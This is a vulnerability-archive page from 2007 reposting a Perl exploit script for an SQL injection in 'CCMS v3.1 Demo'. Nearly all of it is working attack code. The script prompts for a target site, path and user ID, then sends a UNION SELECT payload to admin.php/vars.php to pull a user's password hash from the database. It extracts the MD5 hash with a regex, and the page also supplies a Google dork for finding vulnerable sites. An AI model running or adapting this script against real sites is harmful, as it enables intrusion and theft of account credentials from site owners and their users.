Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18771
HistoryDec 30, 2007 - 12:00 a.m.

CCMS v3.1 Demo <= SQL Injection Vulnerability 0day

2007-12-3000:00:00
vulners.com
39

#!/usr/bin/perl
#Found by Pr0metheuS
#Coded by Pr0metheuS
#Gr33tz-Team
#Dork : intitle:"CCMS v3.1 Demo PW"
print "\n";
print "-=-=-=-=-=-=±=-=-=-=-=-=-±=-=-=-=-=|\n";
print "-=-=-=-=-=-=+CCMS Exploit…±=-=-=-=|\n";
print "-=-=-=-=-=-=+Remote MD5 Hash±=-=-=-=|\n";
print "-=-=-=-=-=-=+By Pr0metheus…±=-=-=-=|\n";
print "-=-=-=-=-=-=+Gr33tz to :±=-=-=-=|\n";
print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3±=-=-=-=|\n";
print "
\n";
print "[+] Enter SITE:\n";
$SITE = <STDIN>;
chomp $SITE;
print "[+] Enter PATH:\n";
$PATH = <STDIN>;
chomp $PATH;
print "[+] Enter USERID:\n";
$USERID = <STDIN>;
chomp $USERID;
print "\n";
#Send Request
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => "$SITE$PATH/admin.php/vars.php?page=Console&p=1'+union+select+userid,2,3,PASSWORD+from+user+where+userid=$USERID/*");
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
$con = $res->content;
#FIND MD5 IN TEXT REGEX !!!
if ($con =~ "/([0-9a-fA-F]{32})/") {
print "
\n";
print "-=-=-=-=-=-=±=-=-=-=-=-=-±=-=-=-=-=|\n";
print "-=-=-=-=-=-=+CCMS Exploit…±=-=-=-=|\n";
print "-=-=-=-=-=-=+Remote MD5 Hash±=-=-=-=|\n";
print "-=-=-=-=-=-=+By Pr0metheus…±=-=-=-=|\n";
print "-=-=-=-=-=-=+Gr33tz to :±=-=-=-=|\n";
print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3±=-=-=-=|\n";
print "[+] Exploit successful!\n";
print "[+] USERID:$USERID\n";
print "[+] MD5:$1\n";
print "\n";
}
else{
print "
\n";
print "-=-=-=-=-=-=±=-=-=-=-=-=-±=-=-=-=-=|\n";
print "-=-=-=-=-=-=+CCMS Exploit…±=-=-=-=|\n";
print "-=-=-=-=-=-=+Remote MD5 Hash±=-=-=-=|\n";
print "-=-=-=-=-=-=+By Pr0metheus…±=-=-=-=|\n";
print "-=-=-=-=-=-=+Gr33tz to :±=-=-=-=|\n";
print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3±=-=-=-=|\n";
print "[+] Exploit Failed!\n";
}